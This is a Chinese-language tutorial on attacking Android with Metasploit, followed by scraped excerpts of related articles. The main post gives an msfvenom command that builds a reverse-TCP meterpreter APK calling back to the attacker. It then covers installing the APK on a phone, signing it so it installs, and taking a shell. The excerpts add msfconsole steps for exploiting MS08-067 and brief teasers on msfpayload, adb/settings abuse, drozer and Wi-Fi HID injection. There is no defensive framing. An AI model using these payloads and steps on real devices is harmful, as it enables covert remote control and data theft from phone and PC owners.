利用Metasploit攻击Android

首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是:

msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk

注释:-p:指的是在本次环境中攻击所使用的payload,这个payload就是将Android攻击成功之后的反弹连接发送到攻击者的终端上来;’

LHOOST与LPORT指的是本地反弹的ip地址与本地监听端口;

-R:表示要生成的文件类型;

> /root/rb.apk:表示生成文件的保存路径;

那么接下来就开始配置:

攻击端配置成功之后在手机端将之前生成好的apk文件导入手机中,然后供给端就开始exploit,则可以看出回话的连接状态:

选择连接会话,进入控制shell,则可以查看使得内容信息与版本信息:

注意:在将Kali里面生成的apk文件直接导入手机时可能会发生错误,那是因为apk文件缺少授权,所以我们下载一个制作签名的软件,给此文件进行授权,则就可以导入了

时间: 2024-08-23 20:27:12

利用Metasploit攻击Android的相关文章

利用metasploit攻击有ms8067漏洞的PC机过程

拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器 msfconsole进入msf控制台 输入search ms0-067 找到相应模块 use exploit/windows/smb/ms08_067_netapi  使用相应模块 set PAYLOAD windows/meterpreter/reverse_tcp 设置反弹连接 show options 查看设置选项 set RHOST 192.168.80.XX 设置远程主机 set LHOST

metasploit攻击载荷独立封装和编码

封装攻击载荷msfpayload:Usage:msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>Summary:summary and optons of payloadC:C languagePerl:PerlRuby:RubyRaw:Raw,allows payload t

利用ADB和Settings命令行工具轻松的攻击Android手机

从4.2开始,Android提供了一个命令行工具settings.这个工具用于帮助构造SettingProvider的客户端代理,从而可以方便的进行系统设置项的读取和设置. 但是这个工具和adb配合起来,将对Android的安全构成极大的威胁.因为通过adb来执行settings时的时候,uid是shell,而shell拥有非常多的特权. 当然,问题的根源在于adb的shell权限太高,毕竟即使没有settings这个工具(或者说没有/system/framework/settings.jar文

利用drozer进行Android渗透测试

一.安装与启动 1. 安装 第一步:从http://mwr.to/drozer下载Drozer (Windows Installer) 第二步:在Android设备中安装agent.apk adb install agent.apk 2. 启动 第一步:在PC上使用adb进行端口转发,转发到Drozer使用的端口31415 adb forward tcp:31415 tcp:31415 第二步:在Android设备上开启Drozer Agent 选择embedded server-enable

利用HTML5开发Android(7)---HTML5本地存储之Database Storage

在上一篇<HTML5本地存储之Web Storage篇>中,简单介绍了如何利用localStorage实现本地存储:实际上,除了sessionStorage和localStorage外,HTML5还支持通过本地数据库进行本地数据存储,HTML5采用的是"SQLite"这种文件型数据库,该数据库多集中在嵌入式设备上,熟悉IOS/Android开发的同学,应该对SQLite数据库比较熟悉. HTML5中的数据库操作比较简单,主要有如下两个函数: 1.通过openDatabase

基于Wi-Fi的HID注射器,利用WHID攻击实验

WHID代表基于 Wi-Fi 的 HID 注射器,即对 HID 攻击进行无线化攻击的一种注入工具. 实验攻击原理如下图: 攻击者使用ESP8266作为AP,在自己的电脑创建客户端连接AP.在客户端键入命令发送到ESP8266,它再利用串口转发给Arduino Leonardo.利用Arduino中的Keyboard库就可以使用传输的命令控制目标主机的键盘. 前期准备 1. 硬件设备 Arduino Leonardo ESP8266 Wi-Fi模块 FT282串口调试模块 2. 软件环境 sock

演示使用Metasploit入侵Android

文本演示怎么使用Kali Linux入侵Android手机. Kali Linux IP地址:192.168.0.112:接收连接的端口:443. 同一局域网内android手机一部(android 5.1) 创建一个后门程序 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk 这个后门程序(APK)是发送给受害者的:要把上面命令的IP地址替换为

利用Selenium自动化测试android wap页

http://blogs.360.cn/360qtest/2014/04/01/%E5%88%A9%E7%94%A8selenium%E8%87%AA%E5%8A%A8%E5%8C%96%E6%B5%8B%E8%AF%95android-wap%E9%A1%B5/ 针对智能手机端的应用的自动化测试,目前主要分两类:一是基于APP的apk自动化测试,二是浏览器的wap页测试.目前做的较多的是第一种情况,应用的自动化测试框架也较多,如NativeDriver.Robotium.calabash等:而

利用Mono?For?Android开发的恶意软件

近期AVL移动安全团队首次发现一款使用Mono for Android开发的恶意APP,该应用除了使用C#语言开发,还加入了Lua环境,可以执行恶意Lua脚本. Mono for Android简介 Mono for Android由Novell推出,是业界首个使用Microsoft Visual Studio 为Android平台开发Microsoft.Net应用程序的解决方案,该程序利用C#语法能进行开发基于Android和iOS的应用. Mono for Android由Mono内核运行时